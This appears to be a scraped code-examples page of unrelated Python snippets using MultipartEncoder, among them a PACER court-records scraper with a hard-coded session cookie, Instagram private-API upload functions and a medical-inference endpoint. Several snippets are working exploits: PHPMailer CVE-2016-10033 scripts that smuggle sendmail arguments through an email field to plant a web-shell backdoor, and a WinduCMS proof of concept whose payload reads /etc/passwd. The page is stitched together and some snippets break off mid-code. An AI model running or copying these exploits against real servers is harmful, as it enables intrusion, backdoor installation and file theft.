                 requsturl=scrapy.http.Request(pdflink,headers={'Connection': 'keep-alive' , 'Cache-Control': 'max-age=0' , 'Origin': 'https://ecf.almd.uscourts.gov' , 'Upgrade-Insecure-Requests': '1' ,  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' , 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' , 'Referer': 'https://ecf.almd.uscourts.gov/' , 'Accept-Encoding': 'gzip, deflate, br' , 'Accept-Language': 'en-US,en;q=0.9'}, callback=self.parse10)
                 requsturl.meta['pdfname']=response.meta['pdfname']
                 requsturl.meta['base_url']=response.meta['base_url']
                 requsturl.meta['case_number']=response.meta['case_number']
                 requsturl.meta['case_name']=response.meta['case_name']
                 requsturl.meta['description']=response.meta['description']
                 requsturl.meta['date_filed']=response.meta['date_filed']
                 yield requsturl
                 #print pdflink
             except:
                 with open(response.meta['pdfname'],'wb') as f1:
                     f1.write(response.body)
                 item=PacerItems()
                 item['pdflink']="Saved_pdf"
                 item['base_url']=response.meta['base_url']
                 item['case_number']=response.meta['case_number']
                 item['case_name']=response.meta['case_name']
                 item['description']=response.meta['description']
                 item['date_filed']=response.meta['date_filed']
                 #item['base_court_name']=response.meta['base_court_name']
                 yield item
     except:
         if response.body.find('%PDF')==0:
             #print "PDF FOUND"
             with open(response.meta['pdfname'],'wb') as f1:
                 f1.write(response.body)
             item=PacerItems()
             item['pdflink']="Saved_pdf"
             item['base_url']=response.meta['base_url']
             item['case_number']=response.meta['case_number']
             item['case_name']=response.meta['case_name']
             item['description']=response.meta['description']
             item['date_filed']=response.meta['date_filed']
             #item['base_court_name']=response.meta['base_court_name']
             yield item
Ejemplo n.º 31
0
def upload_video(self, video, thumbnail, caption=None, upload_id=None):
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    data = {
        'upload_id': upload_id,
        '_csrftoken': self.token,
        'media_type': '2',
        '_uuid': self.uuid,
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({'X-IG-Capabilities': '3Q4=',
                                 'X-IG-Connection-Type': 'WIFI',
                                 'Host': 'i.instagram.com',
                                 'Cookie2': '$Version=1',
                                 'Accept-Language': 'en-US',
                                 'Accept-Encoding': 'gzip, deflate',
                                 'Content-type': m.content_type,
                                 'Connection': 'keep-alive',
                                 'User-Agent': self.user_agent})
    response = self.session.post(config.API_URL + "upload/video/", data=m.to_string())
    if response.status_code == 200:
        body = json.loads(response.text)
        upload_url = body['video_upload_urls'][3]['url']
        upload_job = body['video_upload_urls'][3]['job']

        with open(video, 'rb') as video_bytes:
            video_data = video_bytes.read()
        # solve issue #85 TypeError: slice indices must be integers or None or have an __index__ method
        request_size = len(video_data) // 4
        last_request_extra = len(video_data) - 3 * request_size

        headers = copy.deepcopy(self.session.headers)
        self.session.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': 'application/octet-stream',
            'Session-ID': upload_id,
            'Connection': 'keep-alive',
            'Content-Disposition': 'attachment; filename="video.mov"',
            'job': upload_job,
            'Host': 'upload.instagram.com',
            'User-Agent': self.user_agent
        })
        for i in range(4):
            start = i * request_size
            if i == 3:
                end = i * request_size + last_request_extra
            else:
                end = (i + 1) * request_size
            length = last_request_extra if i == 3 else request_size
            content_range = "bytes {start}-{end}/{len_video}".format(
                start=start, end=end - 1, len_video=len(video_data)).encode('utf-8')

            self.session.headers.update({'Content-Length': str(end - start), 'Content-Range': content_range})
            response = self.session.post(upload_url, data=video_data[start:start + length])
        self.session.headers = headers

        if response.status_code == 200:
            if self.configure_video(upload_id, video, thumbnail, caption):
                self.expose()
                return True
    return False
    def upload_video(
            self,
            path_to_video: str,
            path_to_thumbnail: str,
            caption: Optional[str] = None,
            upload_id: Optional[str] = None,
            is_sidecar: Optional[bool] = None
        ) -> None:
        """
        Upload video to Instagram

        Args:
            path_to_video: str Path to video file
            path_to_thumbnail: str Path to thumbnail image file
            caption: str Post caption
            upload_id:
            is_sidecar: bool Is part of carousel/a post with multiple videos
                             or photos
        """
        if upload_id is None:
            upload_id = str(int(time.time() * 1000))

        data = {
            'upload_id': upload_id,
            '_csrftoken': self.token,
            'media_type': '2',
            '_uuid': self.uuid
        }

        if is_sidecar:
            data['is_sidecar'] = '1'

        m = MultipartEncoder(data, boundary=self.uuid)

        self.session.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Host': 'i.instagram.com',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': m.content_type,
            'Connection': 'keep-alive',
            'User-Agent': self.USER_AGENT
        })

        response = self.session.post(f"{self.API_URL}upload/video/", data=m.to_string())

        if response.status_code == 200:
            body = json.loads(response.text)
            upload_url = body['video_upload_urls'][3]['url']
            upload_job = body['video_upload_urls'][3]['job']

            video_data = open(path_to_video, 'rb').read()
            # solve issue #85 TypeError: slice indices must be integers or None or have an __index__ method
            request_size = int(math.floor(len(video_data) / 4))
            last_request_extra = (len(video_data) - (request_size * 3))

            headers = copy.deepcopy(self.session.headers)

            self.session.headers.update({
                'X-IG-Capabilities': '3Q4=',
                'X-IG-Connection-Type': 'WIFI',
                'Cookie2': '$Version=1',
                'Accept-Language': 'en-US',
                'Accept-Encoding': 'gzip, deflate',
                'Content-type': 'application/octet-stream',
                'Session-ID': upload_id,
                'Connection': 'keep-alive',
                'Content-Disposition': 'attachment; filename="video.mov"',
                'job': upload_job,
                'Host': 'upload.instagram.com',
                'User-Agent': self.USER_AGENT
            })

            for i in range(0, 4):
                start = i * request_size
                if i == 3:
                    end = i * request_size + last_request_extra
                else:
                    end = (i + 1) * request_size
                length = last_request_extra if i == 3 else request_size
                content_range = f"bytes {start}-{end - 1}/{len(video_data)}"

                self.session.headers.update({
                    'Content-Length': str(end - start),
                    'Content-Range': content_range
                })
                response = self.session.post(upload_url, data=video_data[start:start + length])
            self.session.headers = headers

            if response.status_code == 200:
                if self.configure_video(upload_id, path_to_video, path_to_thumbnail, caption):
                    self.expose()
Ejemplo n.º 33
0
    def _do_inference(self, model_fn):
        """HTTP endpoint provided by the gateway.

        This function should be partially applied with the model_fn argument
        before it is added as a Flask route.

        Flask functions do not need to take any arguments. They receive the
        request data via the module variable flask.request, which is... somehow
        always supposed to be accurate within the context of a request-handler.

        :param callable model_fn: the callback function to use for inference.
        """
        r = flask.request

        try:
            encoding = r.mimetype_params['charset']
        except KeyError:
            encoding = 'utf-8'

        if not r.content_type.startswith('multipart/related'):
            msg = 'invalid content-type {}'.format(r.content_type)
            logger.error(msg)
            return make_response(msg, 400)

        # Decode JSON and DICOMs into BytesIO buffers and pass to model
        mp = MultipartDecoder(
            content=r.get_data(), content_type=r.content_type,
            encoding=encoding
        )

        input_hash = hashlib.sha256()

        for part in mp.parts:
            input_hash.update(part.content)

        input_digest = input_hash.hexdigest()
        logger.debug('received request with hash %s' % input_digest)

        test_logger = tagged_logger.TaggedLogger(logger)
        test_logger.add_tags({ 'input_hash': input_digest })

        request_json_body = json.loads(mp.parts[0].text)
        request_binary_dicom_parts = [BytesIO(p.content) for p in mp.parts[1:]]

        response_json_body, response_binary_elements = model_fn(
            request_json_body, request_binary_dicom_parts, input_digest
        )

        output_hash = hashlib.sha256()
        output_hash.update(json.dumps(response_json_body).encode('utf-8'))

        for part in response_binary_elements:
            output_hash.update(part)

        output_digest = output_hash.hexdigest()

        test_logger.add_tags({ 'output_hash': output_digest })
        test_logger.debug('request processed')

        logger.debug('sending response with hash %s' % output_digest)

        # Serialize model response to text
        response_body_text_elements = self._serializer(
            response_json_body, response_binary_elements
        )

        # Assemble the list of multipart/related parts
        # The json response must be the first part
        fields = []
        fields.append(
            self._make_field_tuple(
                'json-body', json.dumps(response_json_body),
                content_type='application/json'
            )
        )

        fields.extend(
            self._make_field_tuple('elem_{}'.format(i), elem, mimetype)
            for i, (mimetype, elem) in enumerate(response_body_text_elements)
        )

        fields.append(
            self._make_field_tuple(
                'hashes', input_digest + ':' + output_digest,
                content_type='text/plain'
            )
        )

        # Encode using the same boundary and encoding as original
        encoder = MultipartEncoder(
            fields, encoding=mp.encoding, boundary=mp.boundary
        )

        # Override the Content-Type header that MultipartEncoder uses
        # flask.make_response takes content, response code, and headers
        return make_response(
            encoder.to_string(), 200,
            {'Content-Type': 'multipart/related; boundary={}'.format(mp.boundary)}
        )
Ejemplo n.º 34
0
#    in order to not work out of the box
fields = {
    'action':
    'submit',
    'name':
    payload,
    'email':
    '"a\\\" -OQueueDirectory=%s -X%s/%s \"@protonmail.com' %
    (queue_dir_path, www_path, backdoor_file),
    'message':
    'Pwned'
}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers = {'User-Agent': 'curl/7.47.0', 'Content-Type': m.content_type}

# If set runs HTTP requests through Burp
proxies = {'http': 'localhost:8080', 'https': 'localhost:8080'}
# proxies = None

log.info("Sending SHELL to target")

r = requests.post(target, data=m.to_string(), headers=headers, proxies=proxies)

log.info("Finish")

if r.status_code == 200:
    log.info("Exploited %s" % target)
Ejemplo n.º 35
0
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗")
print("██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║")
print("╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝")
print("      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com")
print(" Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski\n")

target = 'http://*****:*****@protonmail.com',
        'message': 'Pwned'}

m = MultipartEncoder(fields=fields,
                     boundary='----WebKitFormBoundaryzXJpHSq4mNy35tHe')

headers={'User-Agent': 'curl/7.47.0',
         'Content-Type': m.content_type}

proxies = {'http': 'localhost:8081', 'https':'localhost:8081'}


print('[+] SeNdiNG eVIl SHeLL To TaRGeT....')
r = requests.post(target, data=m.to_string(),
                  headers=headers)
print('[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D')
r = requests.get(target+backdoor, headers=headers)
if r.status_code == 200:
    print('[+]  ExPLoITeD ' + target)
Ejemplo n.º 36
0
 def parse6(self, response):
     #with open("pacer_html4444.html",'w') as f1:
     #    f1.write(response.body)
     form_data = {
         'all_case_ids': '0',
         'case_num': '',
         'last_name': '',
         'first_name': '',
         'middle_name': '',
         'office': '',
         'nsuit': '',
         'case_type': '',
         'cause': '',
         'case_flags': '',
         'filed_from': '9/12/2018',
         'filed_to': '10/12/2018',
         'ShowFull': '1',
         'Key1': 'cs_sort_case_numb',
         'UserType': ''
     }
     me = MultipartEncoder(fields=form_data)
     me_boundary = me.boundary[2:]  #need this in headers
     me_length = me.len  #need this in headers
     me_body = me.to_string()
     header = {
         'Connection': 'keep-alive',
         'Cache-Control': 'max-age=0',
         'Origin': 'https://ecf.almd.uscourts.gov',
         'Upgrade-Insecure-Requests': '1',
         'Content-Type':
         'multipart/form-data; charset=utf-8; boundary=' + me_boundary,
         'User-Agent':
         'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',
         'Accept':
         'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
         'Referer': 'https://ecf.almd.uscourts.gov/',
         'Accept-Encoding': 'gzip, deflate, br',
         'Accept-Language': 'en-US,en;q=0.9'
     }
     #bodydata='------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="all_case_ids"\r\n\r\n0\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="case_num"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="last_name"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="first_name"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="middle_name"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="office"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="nsuit"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="case_type"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="cause"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="case_flags"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="filed_from"\r\n\r\n9/1/2018\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="filed_to"\r\n\r\n9/21/2018\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="ShowFull"\r\n\r\n1\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="Key1"\r\n\r\ncs_sort_case_numb\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp\r\nContent-Disposition: form-data; name="UserType"\r\n\r\n\r\n------WebKitFormBoundarylLLtL7XgUBaPnHEp--\r\n'
     urlcode = response.xpath(
         '//*[@id="cmecfMainContent"]/form/@action').extract()[0]
     #print urlcode
     link = response.meta['base_url'].rstrip('/') + urlcode.replace(
         '..', '')
     #print link
     #req=scrapy.FormRequest(link, meta = {'dont_redirect': True,'handle_httpstatus_list': [500,302]}, body=bodydata, headers={'Connection': 'keep-alive' , 'Cache-Control': 'max-age=0' , 'Origin': 'https://pacer.login.uscourts.gov' , 'Upgrade-Insecure-Requests': '1' , 'Content-Type': 'application/x-www-form-urlencoded' , 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' , 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' , 'Referer': 'https://pacer.login.uscourts.gov/csologin/login.jsf' , 'Accept-Encoding': 'gzip, deflate, br' , 'Accept-Language': 'en-US,en;q=0.9' }, callback=self.parse7, method="POST")
     req = scrapy.Request(link,
                          meta={
                              'dont_redirect': True,
                              'handle_httpstatus_list': [500, 302]
                          },
                          body=me_body,
                          headers=header,
                          callback=self.parse7,
                          method="POST")
     req.cookies = {
         '_ga': 'GA1.2.1437274789.1534401822',
         'ClientValidation': "",
         'ClientCodeDescription': "",
         'MENU': 'slow',
         'PacerSession':
         '0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q',
         'NextGenCSO':
         '0oxdQUxn4oxv1KlUJAvfr4kkFQEROH2k0tiDHGNeUEdE2oO5N3NeEJmy5AsVBQiPvefaUJSXI9DSOfshoFpoY94Bgv4EJaiC2mt7Zv2ecmzRpIT4nBqY2COBdjf3YQ0Q',
         'PacerClientCode': 'Lumina',
         'PacerClient': "",
         'ClientDesc': "",
         'PacerPref': "receipt=Y"
     }
     req.meta['base_url'] = response.meta['base_url']
     req.meta['initial_url'] = response.meta['initial_url']
     #req.meta['base_court_name']=response.meta['base_court_name']
     yield req
Ejemplo n.º 37
0
def upload_photo(self,
                 photo,
                 caption=None,
                 upload_id=None,
                 from_video=False,
                 force_resize=False,
                 options={}):
    """Upload photo to Instagram

    @param photo         Path to photo file (String)
    @param caption       Media description (String)
    @param upload_id     Unique upload_id (String). When None, then generate automatically
    @param from_video    A flag that signals whether the photo is loaded from the video or by itself (Boolean, DEPRECATED: not used)
    @param force_resize  Force photo resize (Boolean)
    @param options       Object with difference options, e.g. configure_timeout, rename (Dict)
                         Designed to reduce the number of function arguments!
                         This is the simplest request object.

    @return Boolean
    """
    options = dict({
        'configure_timeout': 15,
        'rename': True
    }, **(options or {}))
    if upload_id is None:
        upload_id = str(int(time.time() * 1000))
    if not photo:
        return False
    if not compatible_aspect_ratio(get_image_size(photo)):
        self.logger.error(
            'Photo does not have a compatible photo aspect ratio.')
        if force_resize:
            photo = resize_image(photo)
        else:
            return False

    with open(photo, 'rb') as f:
        photo_bytes = f.read()

    data = {
        'upload_id':
        upload_id,
        '_uuid':
        self.uuid,
        '_csrftoken':
        self.token,
        'image_compression':
        '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}',
        'photo': ('pending_media_%s.jpg' % upload_id, photo_bytes,
                  'application/octet-stream', {
                      'Content-Transfer-Encoding': 'binary'
                  })
    }
    m = MultipartEncoder(data, boundary=self.uuid)
    self.session.headers.update({
        'X-IG-Capabilities': '3Q4=',
        'X-IG-Connection-Type': 'WIFI',
        'Cookie2': '$Version=1',
        'Accept-Language': 'en-US',
        'Accept-Encoding': 'gzip, deflate',
        'Content-type': m.content_type,
        'Connection': 'close',
        'User-Agent': self.user_agent
    })
    response = self.session.post(config.API_URL + "upload/photo/",
                                 data=m.to_string())

    configure_timeout = options.get('configure_timeout')
    if response.status_code == 200:
        for attempt in range(4):
            if configure_timeout:
                time.sleep(configure_timeout)
            if self.configure_photo(upload_id, photo, caption):
                media = self.last_json.get('media')
                self.expose()
                if options.get('rename'):
                    from os import rename
                    rename(photo, "{}.REMOVE_ME".format(photo))
                return media
    return False
Ejemplo n.º 38
0
    def uploadVideo(self, video, thumbnail, caption=None, upload_id=None):
        if upload_id is None:
            upload_id = str(int(time.time() * 1000))
        data = {
            'upload_id': upload_id,
            '_csrftoken': self.token,
            'media_type': '2',
            '_uuid': self.uuid,
        }
        m = MultipartEncoder(data, boundary=self.uuid)
        self.s.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Host': 'i.instagram.com',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': m.content_type,
            'Connection': 'keep-alive',
            'User-Agent': self.USER_AGENT
        })
        response = self.s.post(self.API_URL + "upload/video/",
                               data=m.to_string())
        if response.status_code == 200:
            body = json.loads(response.text)
            upload_url = body['video_upload_urls'][3]['url']
            upload_job = body['video_upload_urls'][3]['job']

            videoData = open(video, 'rb').read()
            request_size = math.floor(len(videoData) / 4)
            lastRequestExtra = (len(videoData) - (request_size * 3))

            headers = copy.deepcopy(self.s.headers)
            self.s.headers.update({
                'X-IG-Capabilities': '3Q4=',
                'X-IG-Connection-Type': 'WIFI',
                'Cookie2': '$Version=1',
                'Accept-Language': 'en-US',
                'Accept-Encoding': 'gzip, deflate',
                'Content-type': 'application/octet-stream',
                'Session-ID': upload_id,
                'Connection': 'keep-alive',
                'Content-Disposition': 'attachment; filename="video.mov"',
                'job': upload_job,
                'Host': 'upload.instagram.com',
                'User-Agent': self.USER_AGENT
            })
            for i in range(0, 4):
                start = i * request_size
                if i == 3:
                    end = i * request_size + lastRequestExtra
                else:
                    end = (i + 1) * request_size
                length = lastRequestExtra if i == 3 else request_size
                content_range = "bytes {start}-{end}/{lenVideo}".format(
                    start=start, end=(end - 1),
                    lenVideo=len(videoData)).encode('utf-8')

                self.s.headers.update({
                    'Content-Length': str(end - start),
                    'Content-Range': content_range,
                })
                response = self.s.post(upload_url,
                                       data=videoData[start:start + length])
            self.s.headers = headers

            if response.status_code == 200:
                if self.configureVideo(upload_id, video, thumbnail, caption):
                    self.expose()
        return False
Ejemplo n.º 39
0
# Vendor Homepage: http://windu.org
# Version: 3.1
# Tested on: Linux Debian 9
#
# // Description //
#   
# Local File Disclosure vulnerability exists in WinduCMS through a vulnerable PHPMailer version 5.2.1 used here
# 
# // PoC //
#
# It requires a contact form present on the website
#
# Example: {{W name=contactForm inputs="name" email="root@localhost"}}
#

from requests_toolbelt import MultipartEncoder
import requests

print("WinduCMS <= 3.1 Exploit")
 
url = 'http://localhost/contact_page?mn=contactform.message.negative'
email = '*****@*****.**'
payload = '<img src="/etc/passwd"'
form_input = 'name'
fields = {'form_key': 'contactForm', form_input: 'Attacker', 'email': email, 'content': payload}
m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundary1500777958139315')
headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 'Content-Type': m.content_type}
print('Sending payload to target...')
r = requests.post(url, data=m.to_string(), headers=headers)
if r.status_code == 200:
	print('Exploited.')